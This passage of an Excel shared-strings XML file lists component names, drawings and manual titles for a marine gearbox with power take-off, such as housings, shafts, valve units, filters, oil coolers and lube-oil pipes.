    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBINE INLET AND OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STATIONARY PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIRE EXTINGUISHING-STEAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ME - Operation Manual</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEB - Operation Manual</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MC/MC-C - Operation Manual</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MC-S - Operation Manual</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MC-S - Operation Std. Manual</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MC/MC-C - Operation.Std.Manual</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ME/ME-C - Operation Std. Manual</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sectional drawing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sectional drawing - PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sectional drawing - Front PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sectional drawing - Aft end PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Installation drawing - PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Installation drawing - Front PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Install drawing - Aft end PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dimension drawing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dimension drawing - PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dimension drawing - Front PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dimension drawing - Aft end PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dimension sketch - Thrust flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency operation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide Information</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Selection chart</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foundation parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foundation Chocks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Disc for chock</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piping diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bolt tightening data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tolerance data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pull-up distance for cones</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bore out - hub for coupling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear oil specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Painting spec - internal comp</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Painting spec - external comp</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning of pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test form - Assembling of gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test form - Assembling of PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test of gear with engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test of gear - separately</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test of gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test form - Gear data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection form - Bore out</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection form - Valve unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Signs for gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Signs for valve unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Label for position sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Placement of label for sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flestar dimension skecth</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flexstar PTO - Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Testskema - Flexstar - Mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sign for Flexstar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox bore out complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox bore out</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox lower part casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox intermediate part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox intermediate part casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox upper components</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox upper part casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox cap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gearbox cap casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust bearing cover complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust bearing cover low casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust bearing cover top casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing support - Fore</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing support - Aft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing support casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing cap - Fore</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing cap - Aft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Locking ring for thrust washer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Supporting bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covers on gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covers for PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover on front end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End cover on front end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End cover mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Service cover on front end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover on aft end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End cover on aft end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Side cover - PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Side cover - PTO casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top cover - Servo housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Protection cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Throw off ring cover input shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Throw off ring cover PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gasket for cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pump housing complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pump housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pump housing upper part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pump housing lower part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pump housing aft part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover for oil pump housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO housing mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO housing complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO Internal component</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO housing upper part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO housing upper part casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO housing intermediate part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO housing intermediate casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO housing lower part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO housing lower part casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO housing adapter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO Bearing covers - Fore</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO Bearing covers - Aft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo housing mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo housing complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch housing mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch housing complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch housing upper part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch housing lower part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch housing casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Input shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Input shaft premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch shaft premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust shaft premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Supporting shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Supporting shaft premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO shaft complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO shaft with pinion - master</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO shaft with pinion</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO shaft premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate shaft premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Conical sleeve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pinion complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pinion - Premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear wheel and Oil guard</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear wheel - Premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pinion for PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear wheel for centre PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear wheel for offset PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PTO drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spline - internal toothing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spline - external toothing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tooth data - pinion / gear wheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tooth data - PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tooth data - Pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch cylinder premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Declutching ring premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End cover for clutch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Curved tooth clutch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting of tooth clutch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo piston complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo piston premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo cylinder premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange for servo piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange for piston premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide pin for servo piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bush for servo piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil pipe complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil pipe - Blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plug for servo oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bush for servo oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Magnet disc complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Magnet disc for sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Magnet for sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Distance ring for sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bush - steel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bush - white metal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bush - premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Conical bush</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting of axial guides</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Axial guide - fore</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Axial guide - aft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Throw off ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft scraper ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring for shaft sealing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover for shaft sealing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange - input shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange - piston rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Brake block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Turning gear mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve unit mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve block premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve block casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve block - subplate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bush for servo oil pressure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve cone for valve unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety valve unit mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety valve unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Proportional valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adapter plate - Propertional v.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Solenoid valve w/flow reduction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Solenoid valve w/press.reduction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connector for solenoid valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure relief valve Cartridge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure relief valve Sandwish</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flow reduction valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flow reduction valve - Sandwish</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Back pressure valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Block for back pressure valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Change over valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plate for check valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Change over Valve - complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover for valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slide and Bush - complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring for valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shim for valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefilter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefilter element</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefilter basket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top cover - prefilter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prefilter housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>High pressure filter - mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>High pressure filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil filter - mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>High pressure filter element</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil filter element</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil filter basket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide for filter basket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide plate for filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gasket packet - filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Filter Cap - complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Filter Cap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover for filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Waste oil tray - mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pump with pinion</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pump complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sealing packet for oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Groove ball bearing for oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spline for oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gasket for oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear stand-by oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil cooler complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover for oil cooler casted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure plate - oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Duct plate - oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Distance piece - oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide pin - oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Passpartition</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Double cooler unit mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Double cooler unit complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for double cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plate for bracket -double cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermostatic element</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting cover - pitch control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for cross head housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cross head housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guard for actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rod for handle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for handle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide pin for cross head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arm for cross head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft for emergency running</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connecting link for actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide pin for actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Forked arm - pitch control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide for forked arm</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stud bolt - forked arm</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sleeve and sleeve bush complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sleeve bush for reversing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Locking plate for sleeve bush</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil sleeve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil sleeve - premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Distance ring for oil sleeve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End cover for oil sleeve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover for oil sleeve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover for oil sleeve - blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring for oil sleeve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve housing - oil sleeve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nonreturn valve - complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nonreturn valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe for dipstick complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Head for dipstick</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dummy plug for dipstick</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Potentiometer housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wire wheel for potentiometer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wire wheel complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wire wheel - pitch indicator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for wire wheel complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for wire wheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide pin for wire wheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wire cable</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nipple with screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Internal pipes mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>External pipe mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil pipe mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil pipe mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Suction pipe - gearbox/prefilter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Suction pipe - prefilter/pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Suction pipe for standby pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - PTO house</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - Oil sleeve</t>
